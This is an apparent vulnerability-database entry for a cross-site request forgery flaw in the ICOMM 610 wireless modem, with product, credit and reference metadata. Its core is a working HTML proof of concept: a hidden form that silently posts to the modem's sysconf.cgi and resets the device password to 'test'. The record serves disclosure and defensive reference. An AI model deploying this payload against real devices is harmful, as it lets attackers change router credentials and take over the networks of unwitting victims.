ID
VAR-E-201404-0067
EDB ID
39138
TITLE
ICOMM 610 Wireless Modem - Cross-Site Request Forgery - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
ICOMM 610 Wireless Modem - Cross-Site Request Forgery. CVE-105363 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | icomm | model: | wireless modem | scope: | eq | version: | 610 | Trust: 1.0 |
EXPLOIT
source: https://www.securityfocus.com/bid/66593/info
ICOMM 610 is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
ICOMM 610 01.01.08.991 and prior are vulnerable.
<html>
<!-- CSRF PoC --->
<body>
<form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
CREDITS
Blessen Thomas
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 39138 | Trust: 1.9 |
db: | BID | id: | 66593 | Trust: 1.9 |
db: | EDBNET | id: | 60132 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/66593/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/39138/ | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/39138 | Trust: 0.3 |
SOURCES
db: | BID | id: | 66593 |
db: | EXPLOIT-DB | id: | 39138 |
db: | EDBNET | id: | 60132 |
LAST UPDATE DATE
2022-07-27T09:37:55.930000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 66593 | date: | 2014-04-02T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 66593 | date: | 2014-04-02T00:00:00 |
db: | EXPLOIT-DB | id: | 39138 | date: | 2014-04-12T00:00:00 |
db: | EDBNET | id: | 60132 | date: | 2014-04-12T00:00:00 |